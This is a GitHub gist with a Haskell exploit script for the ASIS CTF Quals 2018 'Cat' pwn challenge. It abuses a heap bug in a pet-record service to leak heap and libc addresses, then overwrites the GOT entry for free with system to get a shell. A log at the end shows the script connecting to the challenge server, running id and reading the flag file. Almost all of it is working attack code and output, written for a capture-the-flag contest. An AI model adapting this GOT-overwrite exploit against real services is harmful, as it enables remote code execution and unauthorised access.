Skip to content

Instantly share code, notes, and snippets.

@Tosainu
Created April 30, 2018 19:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Tosainu/d156bed1204cd90ae7a99312b270b409 to your computer and use it in GitHub Desktop.
Save Tosainu/d156bed1204cd90ae7a99312b270b409 to your computer and use it in GitHub Desktop.
{-# LANGUAGE OverloadedStrings #-}
-- ASIS CTF Quals 2018: Cat
import Control.Monad
import Control.Monad.IO.Class (liftIO)
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Numeric (showHex)
import System.Environment
-- https://github.com/Tosainu/pwn.hs
import Pwn
show' :: (Show a) => a -> BS.ByteString
show' = BS.pack . show
main :: IO ()
main = pwn $ do
args <- liftIO getArgs
let isRemote = "remote" `elem` args
(host, port) = if isRemote then ("178.62.40.102", 6000)
else ("192.168.122.10", 4000)
let reloc_puts = 0x00602028
reloc_putchar = 0x00602020
reloc_free = 0x00602018
reloc_puts_value = 0x004006b6
libc_puts' = 0x0006f690
libc_system' = 0x00045390
r <- remote host port
let create :: MonadPwn m => BS.ByteString -> BS.ByteString -> Int -> m Int
create name kind old = do
recvuntil r "command?\n> "
sendline r "1"
recvuntil r "What's the pet's name?\n> "
send r name
recvuntil r "What's the pet's kind?\n> "
send r kind
recvuntil r "How old?\n> "
send r $ show' old
recvuntil r "create record id:"
fst . fromJust . BS.readInt <$> recvline r
edit :: MonadPwn m => Int -> Bool -> BS.ByteString -> BS.ByteString -> Int -> m ()
edit idx modify name kind old = do
recvuntil r "command?\n> "
sendline r "2"
recvuntil r "which id?\n> "
sendline r $ show' idx
recvuntil r "What's the pet's name?\n> "
send r name
recvuntil r "What's the pet's kind?\n> "
send r kind
recvuntil r "How old?\n> "
send r $ show' old
recvuntil r "Would you modify? (y)/n> "
if modify then sendline r "y"
else sendline r "n"
printSingle :: MonadPwn m => Int -> m BS.ByteString
printSingle idx = do
recvuntil r "command?\n> "
sendline r "3"
recvuntil r "which id?\n> "
sendline r $ show' idx
buf <- recvuntil r "\nwhich"
return $ BS.take (BS.length buf - BS.length "\nwhich") buf
printAll :: MonadPwn m => m BS.ByteString
printAll = do
recvuntil r "command?\n> "
sendline r "4"
buf <- recvuntil r "\nwhich"
return $ BS.take (BS.length buf - BS.length "\nwhich") buf
delete :: MonadPwn m => Int -> m ()
delete idx = do
recvuntil r "command?\n> "
sendline r "5"
recvuntil r "which id?\n> "
sendline r $ show' idx
info "leak informations"
r1 <- create "a" "A" 0
r2 <- create "b" "B" 0
r3 <- create "c" "C" 0
r4 <- create "c" "C" 0
delete r2
delete r3
edit r4 False "d" "D" 0
edit r4 True "d" "D" 0
r5 <- create "e" "E" 0
r6 <- create "f" "F" 0
let leakName s =
let s1 = snd $ BS.breakSubstring "name: " s
s2 = fst $ BS.breakSubstring "\nkind" $ BS.drop 6 s1
s3 = s2 <> BS.replicate (8 - BS.length s2) '\x00'
in u64 s3
let leakKind s =
let s1 = snd $ BS.breakSubstring "kind: " s
s2 = fst $ BS.breakSubstring "\nold" $ BS.drop 6 s1
s3 = s2 <> BS.replicate (8 - BS.length s2) '\x00'
in u64 s3
Just heap_base <- fmap (subtract 0x110) . leakKind <$> printSingle r4
success $ " heap_base: 0x" <> showHex heap_base ""
delete r5
edit r1 False "gg" "GG" 0
r7 <- create "ee" (fromJust $ p64 reloc_puts) 0
edit r1 True (fromJust $ p64 reloc_puts_value) (fromJust $ p64 reloc_putchar) 0
Just libc_putchar <- leakName <$> printSingle r7
success $ " libc_putchar: 0x" <> showHex libc_putchar ""
Just libc_puts <- leakName <$> printSingle r1
success $ " libc_puts: 0x" <> showHex libc_puts ""
let libc_base = libc_puts - libc_puts'
success $ " libc_base: 0x" <> showHex libc_base ""
r8 <- create "/bin/sh; " "X" 0
edit r8 False "y" "Y" 0
r9 <- create "z" (fromJust $ p64 reloc_free) 0
edit r8 True (fromJust $ p64 $ libc_base + libc_system') (fromJust $ p64 reloc_putchar) 0
interactive r
-- [x] Opening connection to 178.62.40.102 on port 6000
-- [+] Opening connection to 178.62.40.102 on port 6000: Done
-- [*] leak informations
-- [+] heap_base: 0xcb5000
-- [+] libc_putchar: 0x7f1bfd43c290
-- [+] libc_puts: 0x7f1bfd43a690
-- [+] libc_base: 0x7f1bfd3cb000
-- [*] Entering interactive mode
-- id
-- uid=1000(pwn) gid=1000(pwn) groups=1000(pwn)
-- pwd
-- /
-- cat /home/*/flag*
-- ASIS{5aa9607cca34dba443c2b757a053665179f3f85c}
-- ^C
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment